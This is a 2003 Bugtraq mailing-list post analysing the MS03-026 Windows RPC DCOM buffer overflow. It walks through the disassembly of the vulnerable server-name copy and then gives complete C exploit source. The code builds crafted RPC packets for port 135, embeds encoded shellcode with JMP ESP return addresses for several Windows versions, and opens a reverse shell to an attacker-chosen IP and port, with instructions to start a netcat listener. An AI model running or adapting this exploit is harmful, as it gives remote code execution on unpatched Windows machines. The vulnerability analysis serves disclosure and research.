The Analysis of LSD's Buffer Overrun in Windows RPC Interface(code revised )

From: xundi (xundi_at_xfocus.org)
Date: 07/25/03

  • Next message: NGSSoftware Insight Security Research: "Oracle Extproc Buffer Overflow (#NISR25072003)" 
    To: bugtraq@securityfocus.com <bugtraq@securityfocus.com>
Date: Fri, 25 Jul 2003 11:12:53 +0800

    bugtraq

    The Analysis of LSD's Buffer Overrun in Windows RPC Interface
    Author:Flashsky
    site:www.xfocus.org WWW.VENUSTECH.COM.CN WWW.SHOPSKY.COM
    Email:flashsky@xfocus.org
    Translator:benjurry
    Email:benjurry@xfocus.org

    Foreword
    Jul 16th, 2003,LSD published that they had discovered a critical security vulnerability in all recent

    versions of Microsoft operating systems. The vulnerability affects default installations of Windows NT

    4.0, Windows 2000, Windows XP as well as Windows 2003 Server.But they didn't publish codes or any

    technical details.For analysing and exploit the vulnerability,Members of Xfocus have researched the

    problem and read the code day after night.Through the process,we find the "Microsoft Windows 2000 RPC

    DCOM Interface DOS AND Privilege Escalation Vulnerability",and now we have gotton the reson of

    vulnerability found by LSD.We thanks all members of xfocus and yuange,EYAS,IPXODI,these guys gave us

    much help.And at the same time, we admire LSD for their brightness.

    Analysis

    In fact,MS03-026 fix two vulnerabilities,one is the local stack overflow and the other is remote stack

    overflow .They both result from the same interface,the improper API is following:
    HRESULT CoGetInstanceFromFile(
      COSERVERINFO * pServerInfo,
      CLSID * pclsid,
      IUnknown * punkOuter,
      DWORD dwClsCtx,
      DWORD grfMode,
      OLECHAR * szName,
      ULONG cmq,
      MULTI_QI * rgmqResults
    );

    The sixth Parameter is szName ,In MSDN it is said: File to initialize the object with using

    IPersistFile::Load. May not be NULL. This parameter will result in buff overflow.
    hr =

    CoGetInstanceFromFile(pServerInfo,NULL,0,CLSCTX_REMOTE_SERVER,STGM_READWRITE,L"C:\\123456111111111111111

    1111111111.doc",1,&qi);

    When the filename is too long ,the windows will produce a local buff voerflow,because the

    GetPathForServer function of RPCSS only has 0x220 space. however the API checks the file in local first

    ,and we can't create a file which filename is long than 0x220.So we can't use this API to expoit, but we

    can use fuction of LPC by constructing packet . Here we only focus on remote stack overflow:)

    After the client transfer the Parameter to the server, the server will translate it to format as

    following:
    L“\\servername\c$\1234561111111111111111111111111.doc".
    Then the server will get the servername first,But here is wrong, the windows Does not check the

    parameter,only assigns the stack of 0x20 , 0x20 is MAX length of NETBIOS name.Then buff overflow comes

    into being.
    the key code is list as following:

    GetPathForServer:
    text:761543DA push ebp
    text:761543DB mov ebp, esp
    text:761543DD sub esp, 20h <-----the length is ony 0x20
    text:761543E0 mov eax, [ebp+arg_4]
    text:761543E3 push ebx
    text:761543E4 push esi
    text:761543E5 mov esi, [ebp+hMem]
    text:761543E8 push edi
    text:761543E9 push 5Ch
    text:761543EB pop ebx
    text:761543EC mov [eax], esi
    text:761543EE cmp [esi], bx
    text:761543F1 mov edi, esi
    text:761543F3 jnz loc_761544BF
    text:761543F9 cmp [esi+2], bx
    text:761543FD jnz loc_761544BF
    text:76154403 lea eax, [ebp+String1] <-----------addr to place servername ,only

    have the length of 0X20
    text:76154406 push 0
    text:76154408 push eax
    text:76154409 push esi 〈----------------------here is the parameter of

    filename
    text:7615440A call GetMachineName
    。。。。。。。。。。。。。。。。。。。。。。。。。。 when the fuction return ,it will be buffer

    overflow.

    GetMachineName:
    text:7614DB6F mov eax, [ebp+arg_0]
    text:7614DB72 mov ecx, [ebp+arg_4]
    text:7614DB75 lea edx, [eax+4]
    text:7614DB78 mov ax, [eax+4]
    text:7614DB7C cmp ax, 5Ch 〈-----------------check if it is 0X5C,if

    yes,the servername is over
    text:7614DB80 jz short loc_7614DB93
    text:7614DB82 sub edx, ecx
    text:7614DB84
    text:7614DB84 loc_7614DB84: ; CODE XREF: sub_7614DA19+178j
    text:7614DB84 mov [ecx], ax 〈----------------write the servername to addr,if

    longer than 0x20,buff overflow comes into being
    text:7614DB87 inc ecx
    text:7614DB88 inc ecx
    text:7614DB89 mov ax, [ecx+edx]
    text:7614DB8D cmp ax, 5Ch
    text:7614DB91 jnz short loc_7614DB84
    text:7614DB93

    Now here we find the problem and can exploit it.The only question is that the "\\servername" is named

    bye system,but we can construct it ourselves by sending malformed messages.
    BTW,there can't include "0x5c" in the shellcode because the function GetMachineName checks it .

    Exploit:
    1、The exploit uses JMP ESP (FF E4)to jump ,so we should adjuse the address to other windows version;
    2、The shellcode can connect reversed,so we should run nc -l -p XXX first;
    3、The length of shellcode must be sizeof(shellcode)16=12 ,if not please fill with 0x90,or the packet

    formatof RPC will be wrong;
    4、Before the buffer overflow return ,the 2 Parameters after return address need to be used ,so we

    should these addresses can be written.
    5、The exploit use JMP ESP,and we can expoit by overlaying SEH.

    #include <stdio.h>
    #include <winsock2.h>
    #include <windows.h>
    #include <process.h>
    #include <string.h>
    #include <winbase.h>
    #pragma comment(lib,"ws2_32")
     
    unsigned char bindstr[]={
    0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
    0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
    0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
    0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
    0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
     
    unsigned char request1[]={
    0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
    ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
    ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
    ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
    ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
    ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
    ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
    ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
    ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
    ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
    ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
    ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
    ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
    ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
    ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
    ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
    ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
    ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
    ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
    ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
    ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
    ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
    ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
    ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
    ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00};
     
    unsigned char request2[]={
    0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
    ,0x00,0x00,0x5C,0x00,0x5C,0x00};
     
    unsigned char request3[]={
    0x5C,0x00
    ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
    ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
    ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
    ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
     
     
     

    unsigned int jmpesp_cn_sp3 = "\x29\x2c\xe2\x77";
    unsigned int jmpesp_cn_sp4 = "\x29\x4c\xdf\x77";
    unsigned int jmpesp_en_xp_sp1="\xdb\x37\xd7\x77";
     

     

    unsigned char sc[]=
        "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
        "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
        "\x46\x00\x58\x00\x46\x00\x58\x00"
     
        
      "\x29\x4c\xdf\x77" //sp4
    //"\x29\x2c\xe2\x77"//0x77e22c29

        "\x38\x6e\x16\x76\x0d\x6e\x16\x76" //需要是可写的内存地址
            //下面是SHELLCODE,可以放自己的SHELLCODE,但必须保证sc的整体长度/16=12,不满足自己填充一些0X90吧
            //SHELLCODE不存在0X00,0X00与0X5C
        "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
        "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
        "\x93\x40\xe2\xfa"
        // code
        "\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1"
        "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2"
        "\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93"
        "\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7"
        "\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0"
        "\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8"
        "\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93"
        "\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93"
        "\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0"
        "\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87"
        "\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60"
        "\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5"
        "\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90"
        "\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22"
        "\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18"
        "\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92"
        "\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3"
        "\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93"
        "\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9"
        "\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18"
        "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
        "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
        "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
        "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
        "\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
        "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
     
    unsigned char request4[]={
    0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
    ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
    ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    };
     
    void main(int argc,char ** argv)
    {
        WSADATA WSAData;
        SOCKET sock;
        int len,len1;
        SOCKADDR_IN addr_in;
        short port=135;
        unsigned char buf1[0x1000];
        unsigned char buf2[0x1000];
        unsigned short port1;
        DWORD cb;
        
        printf("RPC DCOM overflow Vulnerability discoveried by LSD\n");
     printf("Code by FlashSky,Flashsky xfocus org,benjurry,benjurry xfocus org\n");
     printf("Welcome to our English Site: http://www.xfocus.org\n");
     printf("Welcome to our Chinese Site: http://www.xfocus.net\n");
     

    if(argc<5)
    {
      printf("useage:%s targetip localIP LocalPort SPVersion\n",argv[0]);
       printf("SPVersion:\n0 w2k Chinese version +sp3\n 1 w2k Chinese version +SP4\n 2 winxp English version +sp1\n");
    exit(1);
    }
     
    if(atoi(argv[4])==0)
    memcpy(sc+36,jmpesp_cn_sp3,sizeof(jmpesp_cn_sp3));
    else if (atoi(argv[4])==1)
    memcpy(sc+36,jmpesp_cn_sp4,sizeof(jmpesp_cn_sp4));
    else if (atoi(argv[4])==2)
    memcpy(sc+36,jmpesp_en_xp_sp1,sizeof(jmpesp_en_xp_sp1));

        if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
        {
            printf("WSAStartup error.Error:%d\n",WSAGetLastError());
            return;
        }
     
        addr_in.sin_family=AF_INET;
        addr_in.sin_port=htons(port);
        addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
        
        if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
        {
            printf("Socket failed.Error:%d\n",WSAGetLastError());
            return;
        }
        if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
        {
            printf("Connect failed.Error:%d",WSAGetLastError());
            return;
        }
        port1 = htons(atoi(argv[3])); //反向连接的端口
        port1 ^= 0x9393;
     cb=inet_addr(argv[2]);//反向连接的IP
        cb ^= 0x93939393;
        *(unsigned short *)&sc[330+0x30] = port1;
        *(unsigned int *)&sc[335+0x30] = cb;
        len=sizeof(sc);
        memcpy(buf2,request1,sizeof(request1));
        len1=sizeof(request1);
        *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2; //计算文件名双字节长度
        *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;//计算文件名双字节长度
        memcpy(buf2+len1,request2,sizeof(request2));
        len1=len1+sizeof(request2);
        memcpy(buf2+len1,sc,sizeof(sc));
        len1=len1+sizeof(sc);
        memcpy(buf2+len1,request3,sizeof(request3));
        len1=len1+sizeof(request3);
        memcpy(buf2+len1,request4,sizeof(request4));
        len1=len1+sizeof(request4);
        *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;
        //计算各种结构的长度
        *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc;
        *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
        *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
        *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
        *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
        *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
        *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;
        if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
        {
                printf("Send failed.Error:%d\n",WSAGetLastError());
                return;
        }
        
        len=recv(sock,buf1,1000,NULL);
        if (send(sock,buf2,len1,0)==SOCKET_ERROR)
        {
                printf("Send failed.Error:%d\n",WSAGetLastError());
                return;
        }
        len=recv(sock,buf1,1024,NULL);
    }

    About XFOCUS.ORG
       Xfocus is a non-profit and free technology organization which was founded in 1998 in China. We are

    devoting to research and demonstration of weaknesses related to network services and communication

    security.
    We hope that we can use new technical tools to achieve our goal, and to broaden our outlook. We also

    hope we can communicate and help with each other through this amazing Internet.
       
       From the Internet. For the Internet. Have fun! 

    ---
        致
礼!
 				
        xundi
        xundi@xfocus.org
          2003-07-25
  • Next message: NGSSoftware Insight Security Research: "Oracle Extproc Buffer Overflow (#NISR25072003)"

    Relevant Pages

    • rpc remote return-into-libc exploit
      ... * have you recently bought one of those expensive new windows security products ... unsigned char request1={ ... unsigned long pointer11; ...
      (Bugtraq)
    • Re: bit fields in a structure
      ... >My code is running on a Windows system ... And isn't that what LITTLE ENDIAN means? ...
      (comp.lang.c)
    • [EXPL] (MS04-032) Microsoft Windows XP Metafile (.emf) Heap Overflow (PoC)
      ... * Microsoft Windows XP Metafile (.emf) Heap ... unsigned char portbind_sc= ...
      (Bugtraq)
    • Re: C programming Newbee
      ... > I am new to C and programming. ... > used as a begginer and should I start on Windows or Linux ?? ... Window * openwindow(int width, int height) ... drawpixel(Window *win, int x, int y, unsigned char r, unsigned char g, ...
      (comp.lang.c)
    • Re: C programming Newbee
      ... >>I am new to C and programming. ... >>used as a begginer and should I start on Windows or Linux ?? ... > drawpixel(Window *win, int x, int y, unsigned char r, unsigned char g, ...
      (comp.lang.c)